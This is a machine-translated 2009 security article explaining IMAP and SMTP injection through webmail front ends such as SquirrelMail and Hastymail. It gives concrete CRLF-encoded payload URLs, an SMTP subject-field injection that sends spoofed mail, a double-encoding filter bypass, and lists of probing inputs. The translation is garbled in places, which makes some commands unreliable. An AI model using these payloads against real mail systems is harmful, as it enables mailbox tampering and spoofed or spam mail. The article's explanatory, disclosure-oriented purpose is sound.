The use of injection techniques to attack the mail server and defenses(a)-vulnerability warning-the black bar safety net

2009-03-05T00:00:00
ID MYHACK58:62200922400
Type myhack58
Reporter 佚名
Modified 2009-03-05T00:00:00

Description

This article will detail through the talk to mail server communication of a Web application, i.e., the webmail application to inject some mail protocols(IMAP and SMTP Protocol)commands to attack a mail server of the principles, methods and defenses.

A Webmail application role

Webmail app through IMAP and SMTP protocols to manage the users and their e-mail between the interaction. From this point, the Webmail application acts as a client application and mail proxy server between the roles. This interactive process by first webmail application to send the user's credentials(registration number and password). In this case, if the IMAP server supports the use of“login”authentication method, then the Webmail application to the IMAP server sends the following shows the command:

| AUTH LOGIN

Similarly, this application will also users a variety of actions(such as accessing a mailbox, send/delete e-mail, exit mail, etc.) is converted into the corresponding IMAP and SMTP commands, then these commands sent to the corresponding mail server. However, the webmail application of limited functionality, so user can generate the application definition option of the corresponding to those of IMAP or SMTP commands. However, the user might change is sent to the mail server of those IMAP and SMTP commands.

Next, let's look at this technique works!

Second, the mail server injection technology principle

With the widely known, such as SQL injection, LDAP injection, SSI injection, XPath injection, CRLF injection and other injection technique is similar, the mail server injection techniques via a user-provided data is not strictly check the webmail application for IMAP commands or SMTP commands injection to the mail server. When through the webmail application uses the backend mail server, not directly via Internet access, the mail server injection techniques particularly useful.

To the mail server to the injection command, the prerequisite is to allow users through the webmail application to access its port 2 5(SMTP)and 1 4 3(IMAP).

The mail server injection to the use of an application of the attacker, they are equivalent to direct access by the firewall to isolate the original e-mail service port(i.e. bypass the firewalls) is. By using this technique, the attacker can perform a wide variety of activities and attacks, as in the end can do what, depending on is injected into the commands of the server type. He says this is because the Webmail application will treat the request from the user is converted into various IMAP and SMTP Protocol commands. The following describes how to use both protocols.

In to IMAP injection, the injected command is ultimately up to the IMAP server implementation, so commands must follow this Protocol formats and specifications. Webmail application in order to complete the customers request, you must tell the IMAP server to communicate, which is exactly what they are vulnerable to this attack causes. In the user to verify the identity of the time, the webmail application the user's credentials is transmitted to the IMAP server, therefore use the IMAP server of the authentication mechanism, without the application having a valid account will be able to conduct IMAP injection. Injecting IMAP commands, the user must identify with the mail server when communicating with all the parameters, and to figure out these parameters with the application of the functional relationship, such as:

◆Authentication/login/exit

◆Mailbox operation(show, read, create, delete, rename)

◆A message operation(read, copy, move, delete)

Let us now look at a using a message reading function to IMAP injection example. Assumes that the webmail application uses the parameter“message_id”to store the user wants to read the message identifier. When a message containing the identifier of the request issued, the request looks like the following look:

http:///read_email.php?message_id=

If the web page“read_email.php”is responsible for displaying related message, it directly sends the request to the IMAP server, and the user does not provide the value to do any testing. Then send the mail server a command will be the following look:

FETCH BODY[HEADER]

In this case, we can through the application to be used with the mail server of the communication of the parameter“message_id”to conduct IMAP injection attacks. For example, you can use the following command to inject the IMAP command“CAPABILITY”: the

http:///read_email.php?message_id=1 BODY[HEADER]%0d%0aZ900 CAPABILITY%0d%0aZ901 FETCH 1


This will cause the server to perform the following IMAP command:

FETCH 1 BODY[HEADER] Z900 CAPABILITY Z901 FETCH 1 BODY[HEADER]


So the server returns the page is displayed in the IMAP server in the“CAPABILITY”command result:

  • CAPABILITY IMAP4rev1 CHILDREN NAMESPACE THREAD=ORDEREDSUBJECT THREAD=REFERENCES SORT QUOTA ACL ACL2=UNION Z900 OK CAPABILITY completed

Third, the SMTP injection

Here, we want to the SMTP server of the injection command, so the injected commands must follow the SMTP Protocol. Due to these activities is the use of the SMTP Protocol of the application allowed, so we basically is to imitate the sending e-mail. To use SMTP injection, the user must be previously authenticated, so the user must have a valid webmail account.

Send email through SMTP message format is as follows:

◆The sender's e-mail address

◆Recipient of the e-mail address

◆Theme

◆The body of the message

◆Accessory

The following is a stored message subject parameters for SMTP injection example.

As described above, the use of this technique requires the user is authenticated, and can be for when sending e-mail webmail parameter of the SMTP command injection. Generally, the webmail application will provide the user with a form, the user must be in a form to provide the necessary information, the information will be sent to the responsible for creating a Send e-mail the required original SMTP command resources.

Send e-mail request is generally as follows:

POST http:///compose.php HTTP/1.1 ... -----------------------------1 3 4 4 7 5 1 7 2 7 0 0 4 2 2 9 2 2 8 7 9 6 8 7 2 5 2 Content-Disposition: form-data; name="subject" SMTP Injection Example -----------------------------1 3 4 4 7 5 1 7 2 7 0 0 4 2 2 9 2 2 8 7 9 6 8 7 2 5 2 ...


This will cause the SMTP server to perform the following command:

MAIL FROM: RCPT T DATA Subject: SMTP Injection Example ...


If the webmail application is not for the parameter“subject”in the value for the necessary verification, then an attacker can inject additional SMTP commands:

POST http:///compose.php HTTP/1.1 ... -----------------------------1 3 4 4 7 5 1 7 2 7 0 0 4 2 2 9 2 2 8 7 9 6 8 7 2 5 2 Content-Disposition: form-data; name="subject" SMTP Injection Example . MAIL FROM: notexist@external.com RCPT T user@domain.com DATA Email data . -----------------------------1 3 4 4 7 5 1 7 2 7 0 0 4 2 2 9 2 2 8 7 9 6 8 7 2 5 2 ...


Above the injected command will generate a will be sent to the mail server in the SMTP command sequence, which contains the MAIL FROM, RCPT TO and DATA commands, as shown below:

MAIL FROM: RCPT T DATA Subject: SMTP Injection Example . MAIL FROM: notexist@external.com RCPT T user@domain.com DATA Email data . ...


Fourth, the mail server injection advantages

For the mail function injection before and people have discussed, but that's the most or the PHP mail()function CRLF injection. However, these articles until now only certain parts of the injection, such as email header injection, etc. This type of injection allows a person to perform various operations(send anonymous e-mail, spam/forwarding, etc.). In fact, the use of the mail server injection techniques can also achieve these purposes, because they are based on the same type of weaknesses. Compared with the mail server injection technology excels is Can to the affected mail server injection to all the commands without any restriction. That is, this use of technology not only allows for the e-mail header injection(“From: ”And“Subject:”, “To:”, etc.), but also to talk to the webmail application to the communication of the mail server(IMAP/SMTP)to inject arbitrary commands.

The mail server injection is far better than the webmail application provides functionality of the“simple”abuse, for example, send large amounts of e-mail, etc. This technology allows people to perform a webmail application provided by the conventional operation with an additional operation, such as by the IMAP command causes the mail server buffer overflow and the like. For the penetration tester to inject arbitrary commands is that they dreamed of, because this in some cases can completely control the mail server, in order to its various weaknesses to be tested.

Five, attack

Below we use examples to explain the different types of mail server attack methods, as well as the mail server injection techniques example. Such instances have occurred in SquirrelMail(1.2. 7 and 1. 4. 5 version)and Hastymail(1.0. 2 and 1. 5)which of the two Webmail applications. Because the SquirrelMail team has abolished the SquirrelMail 1. 2. 7 version, and the recommended minimum version of 1. 4. 6, becauseThe previous version has weaknesses. Hastymail in 1. 5 before all the versions are vulnerable to SMTP and IMAP injection effects, so always check the latest patch. SquirrelMail and Hastymail team on receipt of these questions after the notification, all quickly were corrected. Soon after, Nessus released a check for this vulnerability plug-in.

Attack, must go through the following two steps:

Determine a weakness of the parameters;

To understand its scope.

(A)found to have weakness of the arguments

Identify a weakness of the parameters of the method can be used in other types of injection used method: heuristic method. In other words, to be sent to have an abnormal value(the application of non-expected value)of the request to the original IMAP and SMTP commands to each of the suspicious parameters, and then analyze its behavior, so find out what you can use parameters. The following examples illustrate.

When the user wants to access SquirrelMail in the Inbox(INBOX), the request is as follows:

http: //src/right_main.php? PG_SHOWALL=0&sort=0&startMessage=1&mailbox=INBOX


If a user with the following way to modify the parameter“mailbox”value:

http:///src/right_main.php? PG_SHOWALL=0&sort=0&startMessage=1&mailbox=INBOX%2 2


Then the application will return one of the following shown in error message:

ERROR : Bad or malformed request. Query: SELECT "INBOX"" Server responded: Unexpected extra arguments to Select


Obviously, this is not the application of the desired normal behavior. In addition, the Message Display IMAP command“SELECT”is being executed. Using this method, we can deduce the parameter“mailbox”has a mail server injection vulnerability, accurate to say is vulnerable to IMAP injection attacks. In other cases, there are weaknesses in the parameters of the detection and use of the not so obvious. For example, when a user accesses their Hastymail Inbox, the corresponding request as follows:

http:///html/mailbox.php?id= 7944bf5a2e616484769472002f8c1&mailbox=INBOX


If a user with the following way to modify the parameter“mailbox”value:

http:///html/mailbox.php?id= 7944bf5a2e616484769472002f8c1&mailbox=INBOX"


The application will respond to the following message:

Could not access the following folders: INBOX\" To check for outside changes to the folder list go to the folders page


In this case, the added quotation marks does not change the application behavior.

The results with the user had injected any other character:

http:///html/mailbox.php?id= 7944bf5a2e616484769472002f8c1&mailbox=NOTEXIST


Then the application will return the same error message:

Could not access the following folders: NOTEXIST To check for outside changes to the folder list go to the folders page


If the user attempts to inject other IMAP command:

http:///html/mailbox.php?id= 7944bf5a2e616484769472002f8c1&mailbox=NOTEXIST "%0d%0aA0003%20CREATE%2 0"INBOX. test


Then the application will return an error message:

Unable to perform the requested action Hastymail said:: A0003 SELECT "INBOX" And the IMAP server said:: A0003 NO Invalid mailbox name.


At first glance, it seems that the IMAP injection can not be performed. However, by using quotation marks a change in the form, we are able to achieve the purpose. The next example uses quotation marks the double characters encoded form, i.e.%2 5 2 2, to replace the above single-character form:

http:///html/mailbox.php?id=7944bf5a2e616484769472002f8c1&mailbox= NOTEXIST%2 5 2 2%0d%0aA0003%20CREATE%2 0%2522INBOX. test


In this case, the application does not return any error message, but will also in the Inbox to create the folder“test”. Other abuse situations:

◆Give the parameter an empty value, e.g.“mailbox= ”in.

◆With a non-existent mailbox name to replace certain values, e.g.“mailbox=NotExists”in.

◆To add parameters to other values, e.g.“mailbox=INBOX PARAMETER2”

◆Add other non-standard characters, such as\, ?, @, #, !, |, \n.

◆Add a CRLF sequence, e.g.“mailbox=INBOX%0d%0a”.

(II)scope

Upon detection of the vulnerability parameters(IMAP or a SMTP command), you must understand its scope. In other words, we need to learn to attack of the command, in order to provide the appropriate parameters to inject our IMAP/SMTP commands.

To be able to successfully use the mail server injection techniques, the previous command must use CRLF(“%0d%0a”)end. By this way, the sequence for the isolate command. If the user can be injected into a command and sees the return(by the mail server-generated)error information, then they must further understand the complete operation of the scope, which may like to view their content so simple. The following examples illustrate.

When the user reads in SquirrelMail in the e-mail, will issue the following request:

http:///src/read_body.php?mailbox=INBOX&passed_id=1&startMessage=1 &show_more=0


If a user with the following way to modify the parameters of the“passed_id”value:

http:///src/read_body.php?mailbox=INBOX&passed_id=test&startMessage=1&show_more=0

Then the application will return one of the following shown in error message:

ERROR : Bad or malformed request. Query: FETCH test:test BODY[HEADER] Server responded: Error in IMAP command received by server.


The user can be found here the following fact: the execution of the IMAP command is“FETCH”, and it uses the various parameters. Now, we have found there are weaknesses in the argument and know it is being executed command, so the user already has sufficient information to inject additional command:

http:///src/read_body.php?mailbox=INBOX&passed_id=1 BODY [HEADER]%0d%0aZ900 RENAME INBOX ENTRADA%0d%0aZ910 FETCH 1&startMessaGe=1&show_more=0


This request will be executed on the server the following IMAP command:

FETCH 1 BODY[HEADER] Z900 RENAME INBOX ENTRADA Z910 FETCH 1 BODY[1]

If the user cannot view the error information(i.e., in a“blind injection”scenario), then on the operation information will be extracted from the user request type of operation. For example, if the injection referred to BY“password”in the authentication form parameters to complete, then to be executed IMAP command would be:

AUTH LOGIN

If the injection is through the request parameter“mailbox”to launch, then the IMAP command implementation as shown below:

LIST ""